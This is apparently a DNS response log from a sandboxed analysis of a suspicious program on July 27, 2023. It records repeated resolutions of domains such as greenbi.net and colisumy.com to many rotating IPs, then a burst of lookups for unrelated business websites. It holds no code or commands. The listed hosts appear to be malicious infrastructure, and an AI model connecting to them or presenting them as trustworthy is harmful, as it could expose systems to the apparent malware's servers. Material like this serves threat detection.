Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.004160881 CEST	8.8.8.8	192.168.2.4	0x2d86	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.366734982 CEST	8.8.8.8	192.168.2.4	0xaca5	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.670500994 CEST	8.8.8.8	192.168.2.4	0xf4e3	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:40.858506918 CEST	8.8.8.8	192.168.2.4	0x8163	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		95.86.21.52	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		187.204.99.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		189.232.51.144	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.177278042 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		183.100.39.157	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		190.139.250.133	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		187.134.53.117	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		188.36.122.174	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		190.219.108.202	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.276870012 CEST	8.8.8.8	192.168.2.4	0xc4c9	No error (0)	colisumy.com		222.236.49.123	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		190.139.250.133	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		187.134.53.117	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		188.36.122.174	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		190.219.108.202	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.496439934 CEST	8.8.8.8	192.168.2.4	0x78b	No error (0)	colisumy.com		222.236.49.123	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.590851068 CEST	8.8.8.8	192.168.2.4	0x1f50	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		115.88.24.200	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		183.100.39.157	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		95.86.21.52	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		187.204.99.218	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		189.232.51.144	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.606745005 CEST	8.8.8.8	192.168.2.4	0xdf44	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:41.784924984 CEST	8.8.8.8	192.168.2.4	0x8512	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.254825115 CEST	8.8.8.8	192.168.2.4	0xbfaa	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:42.580687046 CEST	8.8.8.8	192.168.2.4	0xd4ac	No error (0)	h170013.srv22.test-hf.su		91.227.16.22	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.364383936 CEST	8.8.8.8	192.168.2.4	0xb2f1	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:43.755390882 CEST	8.8.8.8	192.168.2.4	0xa708	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		185.12.79.25	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		211.119.84.111	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		211.40.39.251	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		195.158.3.162	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		211.119.84.112	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		190.224.203.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		187.156.114.216	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		200.114.247.163	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:45.594908953 CEST	8.8.8.8	192.168.2.4	0xf1d2	No error (0)	greenbi.net		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:48.648374081 CEST	8.8.8.8	192.168.2.4	0xefb4	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		190.139.250.133	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		151.251.31.98	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		187.134.53.117	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		188.36.122.174	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		190.12.87.61	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		190.219.108.202	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.507638931 CEST	8.8.8.8	192.168.2.4	0x65a8	No error (0)	colisumy.com		222.236.49.123	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:19:52.533144951 CEST	8.8.8.8	192.168.2.4	0x8803	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:00.341315985 CEST	8.8.8.8	192.168.2.4	0x902b	No error (0)	aa.imgjeoogbb.com		154.221.26.108	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.856430054 CEST	8.8.8.8	192.168.2.4	0x2391	No error (0)	www.dgmna.com	dgmna.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:20.856430054 CEST	8.8.8.8	192.168.2.4	0x2391	No error (0)	dgmna.com		192.124.249.20	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.858481884 CEST	8.8.8.8	192.168.2.4	0x8a35	No error (0)	www.quadlock.com	quadlock.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:20.858481884 CEST	8.8.8.8	192.168.2.4	0x8a35	No error (0)	quadlock.com		70.39.251.249	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.860316038 CEST	8.8.8.8	192.168.2.4	0x9b2d	No error (0)	www.ftchat.com		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.860316038 CEST	8.8.8.8	192.168.2.4	0x9b2d	No error (0)	www.ftchat.com		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.861145973 CEST	8.8.8.8	192.168.2.4	0x67c1	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:20.861145973 CEST	8.8.8.8	192.168.2.4	0x67c1	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.867511034 CEST	8.8.8.8	192.168.2.4	0xfe3c	No error (0)	www.jenco.co.uk		104.21.23.9	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.867511034 CEST	8.8.8.8	192.168.2.4	0xfe3c	No error (0)	www.jenco.co.uk		172.67.208.67	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.884588003 CEST	8.8.8.8	192.168.2.4	0xea7e	No error (0)	www.olras.com		80.93.82.33	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.964689016 CEST	8.8.8.8	192.168.2.4	0x5dbf	No error (0)	www.wkhk.net		206.191.152.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.967633963 CEST	8.8.8.8	192.168.2.4	0x2d3d	No error (0)	www.pdqhomes.com	traff-3.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:20.967633963 CEST	8.8.8.8	192.168.2.4	0x2d3d	No error (0)	traff-3.hugedomains.com	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:20.967633963 CEST	8.8.8.8	192.168.2.4	0x2d3d	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.18.7.81	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:20.967633963 CEST	8.8.8.8	192.168.2.4	0x2d3d	No error (0)	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com		3.19.116.195	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.094358921 CEST	8.8.8.8	192.168.2.4	0x9c04	No error (0)	www.baijaku.com	baijaku.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:21.094358921 CEST	8.8.8.8	192.168.2.4	0x9c04	No error (0)	baijaku.com		59.106.19.204	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.195389986 CEST	8.8.8.8	192.168.2.4	0xa3a4	No error (0)	www.rs-ag.com		188.114.97.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.195389986 CEST	8.8.8.8	192.168.2.4	0xa3a4	No error (0)	www.rs-ag.com		188.114.96.7	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.341422081 CEST	8.8.8.8	192.168.2.4	0x9ebc	No error (0)	www.pr-park.com		118.27.125.181	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.372562885 CEST	8.8.8.8	192.168.2.4	0x9f3e	No error (0)	www.alteor.cl	cdn1.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:21.372562885 CEST	8.8.8.8	192.168.2.4	0x9f3e	No error (0)	cdn1.wixdns.net	td-ccm-neg-87-45.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:21.372562885 CEST	8.8.8.8	192.168.2.4	0x9f3e	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.420346022 CEST	8.8.8.8	192.168.2.4	0x965b	No error (0)	www.valdal.com		172.67.73.176	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.420346022 CEST	8.8.8.8	192.168.2.4	0x965b	No error (0)	www.valdal.com		104.26.6.221	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.420346022 CEST	8.8.8.8	192.168.2.4	0x965b	No error (0)	www.valdal.com		104.26.7.221	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.508660078 CEST	8.8.8.8	192.168.2.4	0xa7f2	No error (0)	www.item-pr.com	item-pr.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:21.508660078 CEST	8.8.8.8	192.168.2.4	0xa7f2	No error (0)	item-pr.com		185.15.129.58	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.508660078 CEST	8.8.8.8	192.168.2.4	0xa7f2	No error (0)	item-pr.com		213.186.33.17	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.639039040 CEST	8.8.8.8	192.168.2.4	0xd818	No error (0)	www.vazir.se		206.191.152.37	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.660828114 CEST	8.8.8.8	192.168.2.4	0x395e	No error (0)	www.depalo.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:21.660828114 CEST	8.8.8.8	192.168.2.4	0x395e	No error (0)	ghs.googlehosted.com		172.217.16.179	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.773370981 CEST	8.8.8.8	192.168.2.4	0x6d2d	No error (0)	www.credo.edu.pl		62.122.190.121	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.834423065 CEST	8.8.8.8	192.168.2.4	0x1138	No error (0)	www.elpro.si		172.67.70.22	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.834423065 CEST	8.8.8.8	192.168.2.4	0x1138	No error (0)	www.elpro.si		104.26.14.53	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:21.834423065 CEST	8.8.8.8	192.168.2.4	0x1138	No error (0)	www.elpro.si		104.26.15.53	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.142721891 CEST	8.8.8.8	192.168.2.4	0x92d9	No error (0)	www.otena.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.154803991 CEST	8.8.8.8	192.168.2.4	0x17aa	No error (0)	www.petsfan.com	traff-6.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:22.154803991 CEST	8.8.8.8	192.168.2.4	0x17aa	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:22.154803991 CEST	8.8.8.8	192.168.2.4	0x17aa	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.154803991 CEST	8.8.8.8	192.168.2.4	0x17aa	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.493113041 CEST	8.8.8.8	192.168.2.4	0xaf0b	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.508542061 CEST	8.8.8.8	192.168.2.4	0xe272	No error (0)	www.tvtools.fi		104.21.88.198	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.508542061 CEST	8.8.8.8	192.168.2.4	0xe272	No error (0)	www.tvtools.fi		172.67.152.159	A (IP address)	IN (0x0001)	false
Jul 27, 2023 20:20:22.666414022 CEST	8.8.8.8	192.168.2.4	0x5497	No error (0)	www.evcpa.com	evcpa.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2023 20:20:22.666414022 CEST	8.8.8.8	192.168.2.4	0x5497	No error (0)	evcpa.com		192.124.249.10	A (IP address)	IN (0x0001)	false
